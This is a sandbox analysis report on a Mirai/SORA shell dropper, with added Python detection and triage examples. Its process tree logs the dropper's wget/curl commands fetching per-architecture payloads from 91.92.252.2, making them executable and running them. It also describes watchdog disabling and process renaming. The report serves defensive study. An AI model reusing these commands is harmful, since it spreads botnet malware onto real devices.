Analysis
max time kernel: 150s
max time network: 152s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 03-08-2024 05:14
Static task: static1
Behavioral task behavioral1: sample sora.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample sora.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample sora.sh, resource debian9-mipsbe-20240611-en
General
Target: sora.sh
Size: 2KB
MD5: fe9fcc98f0d2d8350fd699bb3edf3419
SHA1: 5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
SHA256: faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
SHA512: 4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config
Extracted: mirai / SORA
Signatures
- Contacts a large (43719) number of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large number of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Executes dropped EXE (14 IoCs)
  Processes (ioc | pid | process):
  /tmp/robben | 742 | robben
  /tmp/robben | 789 | robben
  /tmp/robben | 800 | robben
  /tmp/robben | 812 | robben
  /tmp/robben | 844 | robben
  /tmp/robben | 850 | robben
  /tmp/robben | 856 | robben
  /tmp/robben | 861 | robben
  /tmp/robben | 867 | robben
  /tmp/robben | 873 | robben
  /tmp/robben | 879 | robben
  /tmp/robben | 885 | robben
  /tmp/robben | 890 | robben
  /tmp/robben | 896 | robben
- Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai opens the hardware watchdog device and disables it, so that the watchdog cannot reboot an infected (and now busy or unresponsive) device and thereby clear the memory-resident infection.
  Processes (description | ioc | process):
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
- Processes (resource | yara_rule):
  /tmp/robben | upx
  /tmp/robben | upx
  /tmp/robben | upx
  /tmp/robben | upx
- Changes its process name (1 IoC)
  Processes (description | ioc | pid | process):
  Changes the process name, possibly in an attempt to hide itself | daigbpgood5bkgo21b | 789 | robben
- Reads runtime system information (35 IoCs)
  Reads data from the /proc virtual filesystem.
  Processes (description | ioc | process):
  File opened for reading | /proc/sys/crypto/fips_enabled | curl (14 reads, one per curl invocation)
  File opened for reading | /proc/<pid>/exe | robben (21 reads, for pids 665, 668, 676, 684, 685, 687, 699, 704, 705, 706, 709, 713, 771, 775, 790, 793, 809, 811, 869, 881, 890)
- Writes file to tmp directory (26 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description | ioc | process):
  File opened for modification | /tmp/robben | sora.sh
  File opened for modification | /tmp/sora.arm4 | curl
  File opened for modification | /tmp/sora.arm5 | curl, wget
  File opened for modification | /tmp/sora.arm6 | curl, wget
  File opened for modification | /tmp/sora.arm7 | curl, wget
  File opened for modification | /tmp/sora.i468 | curl
  File opened for modification | /tmp/sora.i686 | curl, wget
  File opened for modification | /tmp/sora.m68k | curl, wget
  File opened for modification | /tmp/sora.mips | curl, wget
  File opened for modification | /tmp/sora.mpsl | curl, wget
  File opened for modification | /tmp/sora.ppc | curl, wget
  File opened for modification | /tmp/sora.ppc440fp | curl
  File opened for modification | /tmp/sora.sh4 | curl, wget
  File opened for modification | /tmp/sora.x86 | curl, wget
  File opened for modification | /tmp/sora.x86_64 | curl, wget
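The two scan signatures in this section are threshold counts produced by the sandbox. The following is an added example, not part of the report, of checking the same condition against flow logs from a real network: a per-source sliding window over distinct destinations, with an upper bound on distinct destination ports so that a busy but legitimate client does not trigger. The flow records are constructed inline; the choice of ports 23/2323 for the synthetic scanner is an assumption based on how Mirai family bots are generally known to scan, and is not something this report states.

```python
from collections import Counter, defaultdict, deque
import random

# A flow record is (start_time_s, src_ip, dst_ip, dst_port).
Flow = tuple[float, str, str, int]


def constructed_flows(seed: int = 7) -> list[Flow]:
    """Synthetic traffic for the demo: one scanning host and one normal host.

    Everything here is constructed. The report only gives the number of hosts
    contacted (43719); the telnet ports are an assumption based on how Mirai
    family bots are known to scan, not something the report states.
    """
    rng = random.Random(seed)
    flows: list[Flow] = []
    for i in range(3000):                       # scanner: 3000 targets in 30 s
        dst = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        flows.append((i * 0.01, "10.0.0.5", dst, rng.choice((23, 2323))))
    for i in range(3000):                       # busy but normal client
        dst = rng.choice(("93.184.216.34", "1.1.1.1"))
        flows.append((i * 0.01, "10.0.0.8", dst, rng.choice((53, 80, 443))))
    return flows


def scan_candidates(flows, window_s=60.0, min_hosts=500, max_ports=4):
    """Return sources that reach >= min_hosts distinct destinations while using
    <= max_ports distinct destination ports inside any window_s-second window.

    The port bound separates service discovery (many hosts, one or two ports)
    from a chatty but legitimate client (few hosts, many ports and flows).
    """
    by_src = defaultdict(list)
    for f in sorted(flows, key=lambda f: f[0]):
        by_src[f[1]].append(f)

    hits = {}
    for src, fs in by_src.items():
        window = deque()
        hosts, ports = Counter(), Counter()
        for f in fs:
            window.append(f)
            hosts[f[2]] += 1
            ports[f[3]] += 1
            while f[0] - window[0][0] > window_s:          # expire old flows
                old = window.popleft()
                for counter, key in ((hosts, old[2]), (ports, old[3])):
                    counter[key] -= 1
                    if counter[key] == 0:
                        del counter[key]
            if len(hosts) >= min_hosts and len(ports) <= max_ports:
                hits[src] = {"distinct_hosts": len(hosts),
                             "ports": sorted(ports), "first_seen_at": f[0]}
                break                                      # one alert per source
    return hits


if __name__ == "__main__":
    for src, info in scan_candidates(constructed_flows()).items():
        print(f"scan candidate {src}: {info}")
```

Thresholds are site-specific: a device that legitimately talks to hundreds of peers (a DNS resolver, a monitoring poller) needs an allowlist, and the window should be tuned to the flow export interval of the sensor.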
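The watchdog, process-name and /proc signatures in this section are all host-side indicators a responder can check on a suspect device. Added example, not from the report or the sandbox: a small triage that reads the fields the report is built from (`/proc/<pid>/comm`, `exe`, `cmdline`, `fd/*`) and flags execution from a scratch directory, a comm that no longer matches the executable, and an open handle on the watchdog device. The three sample records are constructed to mirror pids 735 and 789 from this report plus a benign daemon; the kernel truncates comm to 15 bytes, so the report's `daigbpgood5bkgo21b` appears as `daigbpgood5bkgo` there.

```python
import os
from dataclasses import dataclass, field

WATCHDOG_NODES = {"/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
COMM_LEN = 15   # the kernel truncates /proc/<pid>/comm to TASK_COMM_LEN-1 bytes


@dataclass
class Proc:
    pid: int
    comm: str            # /proc/<pid>/comm
    exe: str             # readlink(/proc/<pid>/exe)
    argv: list[str]      # /proc/<pid>/cmdline split on NUL
    fds: list[str] = field(default_factory=list)   # readlink(/proc/<pid>/fd/*)


def _name_matches(comm: str, exe_base: str) -> bool:
    """comm is set from the exe name at exec time and truncated to 15 bytes."""
    head = exe_base[:COMM_LEN]
    return head.startswith(comm) or comm.startswith(head)


def findings(p: Proc) -> list[str]:
    """Indicators matching the report: executing from /tmp, a renamed process
    (PR_SET_NAME / argv[0] overwrite), and an open watchdog device."""
    out = []
    exe_base = os.path.basename(p.exe.replace(" (deleted)", ""))
    if p.exe.startswith(SCRATCH_DIRS):
        out.append("exe_in_scratch_dir")
    if p.exe.endswith(" (deleted)"):
        out.append("exe_unlinked")            # binary removed after start
    if not _name_matches(p.comm, exe_base):
        out.append("comm_mismatch")
    if any(fd in WATCHDOG_NODES for fd in p.fds):
        out.append("watchdog_open")
    return out


def snapshot_proc() -> list[Proc]:
    """Collect the same fields from the live /proc (root is needed to read
    other users' exe and fd links; unreadable entries are skipped)."""
    procs = []
    for d in os.listdir("/proc"):
        if not d.isdigit():
            continue
        pid = int(d)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().rstrip("\n")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            exe = os.readlink(f"/proc/{pid}/exe")
            fds = []
            for fd in os.listdir(f"/proc/{pid}/fd"):
                try:
                    fds.append(os.readlink(f"/proc/{pid}/fd/{fd}"))
                except OSError:
                    pass
        except OSError:
            continue
        procs.append(Proc(pid, comm, exe, argv, fds))
    return procs


# Constructed records modelled on the report (not captured from the sandbox).
SAMPLE = [
    Proc(735, "curl", "/usr/bin/curl",
         ["curl", "-O", "http://91.92.252.2/bins/sora.x86"],
         ["/proc/sys/crypto/fips_enabled", "socket:[4421]"]),
    Proc(789, "daigbpgood5bkgo", "/tmp/robben", ["daigbpgood5bkgo21b"],
         ["/dev/watchdog", "/dev/misc/watchdog", "socket:[4470]"]),
    Proc(1203, "sshd", "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"],
         ["/dev/null", "socket:[1100]"]),
]


def triage_processes(procs=SAMPLE) -> dict[int, list[str]]:
    """Map pid -> indicators, omitting processes with nothing to report."""
    return {p.pid: f for p in procs if (f := findings(p))}


if __name__ == "__main__":
    for pid, hits in triage_processes().items():
        print(pid, hits)
```

Multi-call binaries such as busybox, and interpreters, legitimately produce a comm that differs from the exe name, so pair `comm_mismatch` with the other indicators or an allowlist rather than alerting on it alone. On a live host run `snapshot_proc()` as root and pass the result to `triage_processes()`.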
Processes (depth | image | command line | PID | signatures)
1 | /tmp/sora.sh | /tmp/sora.sh | PID 709 | Writes file to tmp directory
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.x86 | PID 714 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.x86 | PID 735 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.x86 | PID 739 |
2 | /bin/chmod | chmod +x robben sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9 | PID 741 |
2 | /tmp/robben | ./robben Payload | PID 742 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.mips | PID 745 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.mips | PID 786 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.mips | PID 787 |
2 | /bin/chmod | chmod +x robben sora.mips sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9 | PID 788 |
2 | /tmp/robben | ./robben Payload | PID 789 | Executes dropped EXE; Modifies Watchdog functionality; Changes its process name; Reads runtime system information
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.x86_64 | PID 796 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.x86_64 | PID 797 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.x86_64 | PID 798 |
2 | /bin/chmod | chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9 | PID 799 |
2 | /tmp/robben | ./robben Payload | PID 800 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.i468 | PID 802 |
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.i468 | PID 803 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.i468 | PID 810 |
2 | /bin/chmod | chmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9 | PID 811 |
2 | /tmp/robben | ./robben Payload | PID 812 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.i686 | PID 815 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.i686 | PID 822 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.i686 | PID 842 |
2 | /bin/chmod | chmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 | PID 843 |
2 | /tmp/robben | ./robben Payload | PID 844 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.mpsl | PID 846 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.mpsl | PID 847 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.mpsl | PID 848 |
2 | /bin/chmod | chmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 | PID 849 |
2 | /tmp/robben | ./robben Payload | PID 850 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.arm4 | PID 852 |
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.arm4 | PID 853 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.arm4 | PID 854 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 | PID 855 |
2 | /tmp/robben | ./robben Payload | PID 856 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.arm5 | PID 857 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.arm5 | PID 858 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.arm5 | PID 859 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 | PID 860 |
2 | /tmp/robben | ./robben Payload | PID 861 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.arm6 | PID 863 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.arm6 | PID 864 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.arm6 | PID 865 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 | PID 866 |
2 | /tmp/robben | ./robben Payload | PID 867 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.arm7 | PID 869 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.arm7 | PID 870 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.arm7 | PID 871 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 | PID 872 |
2 | /tmp/robben | ./robben Payload | PID 873 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.ppc | PID 875 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.ppc | PID 876 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.ppc | PID 877 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 | PID 878 |
2 | /tmp/robben | ./robben Payload | PID 879 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.ppc440fp | PID 881 |
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.ppc440fp | PID 882 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.ppc440fp | PID 883 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 | PID 884 |
2 | /tmp/robben | ./robben Payload | PID 885 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.m68k | PID 886 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.m68k | PID 887 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.m68k | PID 888 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 | PID 889 |
2 | /tmp/robben | ./robben Payload | PID 890 | Executes dropped EXE
2 | /usr/bin/wget | wget http://91.92.252.2/bins/sora.sh4 | PID 892 | Writes file to tmp directory
2 | /usr/bin/curl | curl -O http://91.92.252.2/bins/sora.sh4 | PID 893 | Reads runtime system information; Writes file to tmp directory
2 | /bin/cat | cat sora.sh4 | PID 894 |
2 | /bin/chmod | chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64 | PID 895 |
2 | /tmp/robben | ./robben Payload | PID 896 | Executes dropped EXE
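Each of the 14 rounds in the process tree has the same shape: fetch one URL with both wget and curl, cat the file, chmod +x, then run ./robben. The chmod argument lists grow by one file per round and include the sandbox's own systemd-private-* directory, which points to a glob over the working directory rather than a fixed file name. Added example, not the report's or the sample's code: pulling the network and file IOCs out of the command lines, and a per-parent state machine that flags the fetch, chmod +x, execute-from-scratch-directory chain on a process-event stream. The event list is constructed from the tree above; the report does not print parent pids, so those are assumed (depth 1 = pid 709, depth 2 = its children), and the trailing bash/curl/tar session is a constructed benign contrast.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# (pid, ppid, image, cmdline). Parent pids are not printed in the report; the
# values here are constructed from its tree (depth 1 = pid 709, depth 2 = its
# children). Only the first two fetch/execute rounds plus one benign shell
# session are included; the real tree repeats the pattern 14 times.
EVENTS = [
    (709, 0, "/tmp/sora.sh", "/tmp/sora.sh"),
    (714, 709, "/usr/bin/wget", "wget http://91.92.252.2/bins/sora.x86"),
    (735, 709, "/usr/bin/curl", "curl -O http://91.92.252.2/bins/sora.x86"),
    (739, 709, "/bin/cat", "cat sora.x86"),
    (741, 709, "/bin/chmod", "chmod +x robben sora.sh sora.x86 "
     "systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9"),
    (742, 709, "/tmp/robben", "./robben Payload"),
    (745, 709, "/usr/bin/wget", "wget http://91.92.252.2/bins/sora.mips"),
    (786, 709, "/usr/bin/curl", "curl -O http://91.92.252.2/bins/sora.mips"),
    (787, 709, "/bin/cat", "cat sora.mips"),
    (788, 709, "/bin/chmod", "chmod +x robben sora.mips sora.sh sora.x86 "
     "systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9"),
    (789, 709, "/tmp/robben", "./robben Payload"),
    # constructed benign contrast: fetch and unpack, never chmod/exec from /tmp
    (900, 0, "/bin/bash", "bash"),
    (901, 900, "/usr/bin/curl", "curl -O https://example.invalid/tool.tar.gz"),
    (902, 900, "/bin/tar", "tar xf tool.tar.gz"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# "+x" or a numeric mode with the owner execute bit set (e.g. 755, 777)
CHMOD_EXEC = re.compile(r"(\+x|\b[0-7]?[1357][0-7]{2}\b)")


def extract_iocs(events):
    """Network and file indicators taken straight from the command lines."""
    urls, hosts, fetched, executed = set(), set(), set(), set()
    for _pid, _ppid, image, cmd in events:
        for url in URL_RE.findall(cmd):
            urls.add(url)
            hosts.add(urlparse(url).hostname)
            fetched.add(url.rsplit("/", 1)[-1])
        if image.startswith(SCRATCH_DIRS):
            executed.add(image)
    return {"urls": sorted(urls), "hosts": sorted(hosts),
            "fetched": sorted(fetched), "executed_from_scratch": sorted(executed)}


def fetch_chmod_exec_chains(events):
    """Flag, per parent, the sequence fetch tool -> chmod +x -> execute from a
    scratch directory. Events must be in start order (they are, by pid, in
    the report). State is kept per parent so unrelated shells do not mix."""
    state = defaultdict(lambda: {"fetched": False, "chmod": False})
    hits = []
    for pid, ppid, image, cmd in events:
        st = state[ppid]
        tool = image.rsplit("/", 1)[-1]
        if tool in FETCH_TOOLS and URL_RE.search(cmd):
            st["fetched"] = True
        elif tool == "chmod" and st["fetched"] and CHMOD_EXEC.search(cmd):
            st["chmod"] = True
        elif st["chmod"] and image.startswith(SCRATCH_DIRS):
            hits.append({"parent": ppid, "pid": pid, "image": image, "cmdline": cmd})
    return hits


if __name__ == "__main__":
    print(extract_iocs(EVENTS))
    for h in fetch_chmod_exec_chains(EVENTS):
        print("download-and-execute chain:", h)
```

The same event tuples can be produced from auditd `execve` records or an eBPF process tracer; the only requirement is that the parent pid is carried, because the chain is only suspicious when one parent performs all three steps.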
Downloads
- Filesize: 27KB
  MD5: 545cc0b3e5dae8244debe55a41e14a9f
  SHA1: 101ad459b5b114c0a79c458cd0c0d2374a3698a1
  SHA256: a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91
  SHA512: 1e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611
- Filesize: 28KB
  MD5: 8d068eba527935d34fbff880f4cf7530
  SHA1: 82f50f55fb025735b62fca14362600132b21c2d0
  SHA256: bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147
  SHA512: 6cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14
- Filesize: 28KB
  MD5: fa8042bc292cb4403494d779833de7ca
  SHA1: a78431e9ef2fac7f3a909c06a81e643369a17ee4
  SHA256: 1ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5
  SHA512: fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82
- Filesize: 212B
  MD5: 83ab6cd9a67528bbc6f4f360cb7f8d83
  SHA1: 07e8f17209e0569aab39f062568ff0090d9b20d4
  SHA256: 3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
  SHA512: 171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
- Filesize: 28KB
  MD5: a9d839dd97abb474595bc7e18157aa64
  SHA1: 82c1ec7eae6dd1bc7dcfd1e89911d328c899c885
  SHA256: 3bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d
  SHA512: 4311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993
- Filesize: 64KB
  MD5: 5092e7b4c0b2e9e418ca596ddad29165
  SHA1: 41edb1d01dcd2bacfd437cad4af32791e473e1c0
  SHA256: 43c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845
  SHA512: d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742
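The downloads listed above are the per-architecture payloads fetched by the script, and the YARA match in the Signatures section reports /tmp/robben as UPX-packed. Added example, not the report's or the sandbox's code: an ELF header parser that reports architecture, word size and endianness from e_machine, EI_CLASS and EI_DATA, plus a packing heuristic that a triage script can apply to each fetched file before deciding which one to unpack. The two ELF images at the bottom are constructed stand-ins (a MIPS big-endian packed file and a plain x86_64 one); the real payloads are only identified by hash on this page.

```python
import struct

# ELF e_machine values for the architectures the dropper fetches.
EM_NAMES = {3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm", 42: "sh",
            62: "x86_64"}


def parse_elf_header(data: bytes) -> dict:
    """Decode the ELF32/ELF64 header fields needed for triage."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("bad EI_CLASS/EI_DATA")
    end = "<" if ei_data == 1 else ">"
    fmt = end + ("HHIIIIIHHHHHH" if ei_class == 1 else "HHIQQQIHHHHHH")
    if len(data) < 16 + struct.calcsize(fmt):
        raise ValueError("truncated header")
    (e_type, e_machine, _ver, e_entry, _phoff, e_shoff, _flags, _ehsize,
     _phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack_from(fmt, data, 16)
    return {"bits": 32 if ei_class == 1 else 64,
            "endian": "little" if ei_data == 1 else "big",
            "arch": EM_NAMES.get(e_machine, f"EM_{e_machine}"),
            "type": e_type, "entry": e_entry, "phnum": e_phnum,
            "shoff": e_shoff, "shnum": e_shnum}


def looks_upx_packed(data: bytes, hdr: dict) -> bool:
    """Heuristic: the UPX ELF stub leaves 'UPX!' markers in the file (the
    l_info magic near the start and the PackHeader trailer at the end) and
    writes no section header table. Mirai builds are known to overwrite the
    magic, so a missing section table with only a couple of program headers
    is accepted as well. A hint for triage, not proof."""
    marker = b"UPX!" in data
    no_sections = hdr["shnum"] == 0 and hdr["shoff"] == 0
    return marker or (no_sections and hdr["phnum"] <= 2)


def triage_elf(data: bytes) -> dict:
    hdr = parse_elf_header(data)
    hdr["upx"] = looks_upx_packed(data, hdr)
    return hdr


# --- constructed samples (not the real payloads; those are only hashed above)
def _elf32(machine: int, big_endian: bool, shnum: int, phnum: int) -> bytes:
    end = ">" if big_endian else "<"
    ident = b"\x7fELF" + bytes([1, 2 if big_endian else 1, 1, 0]) + b"\x00" * 8
    return ident + struct.pack(end + "HHIIIIIHHHHHH", 2, machine, 1, 0x400000,
                               52, 0 if shnum == 0 else 0x1000, 0, 52, 32,
                               phnum, 40, shnum, 0)


def _elf64(machine: int, shnum: int, phnum: int) -> bytes:
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    return ident + struct.pack("<HHIQQQIHHHHHH", 2, machine, 1, 0x401000,
                               64, 0 if shnum == 0 else 0x2000, 0, 64, 56,
                               phnum, 64, shnum, 0)


# MIPS big-endian, 32-bit, section table removed, UPX marker present
PACKED_MIPSBE = _elf32(8, True, 0, 2) + b"\x00" * 12 + b"UPX!" + b"\x00" * 48
# x86_64 little-endian with a normal section table and no marker
PLAIN_X86_64 = _elf64(62, 5, 4) + b"\x00" * 64


if __name__ == "__main__":
    for name, blob in (("packed mipsbe", PACKED_MIPSBE), ("plain x86_64", PLAIN_X86_64)):
        print(name, triage_elf(blob))
```

When the magic has been overwritten, `upx -d` refuses the file; the usual route is to restore the three `UPX!` markers (l_info, PackHeader, and the trailing signature) or to let the stub run under an emulator and dump the unpacked image from memory. The arch field tells you which QEMU user-mode binary to use for that.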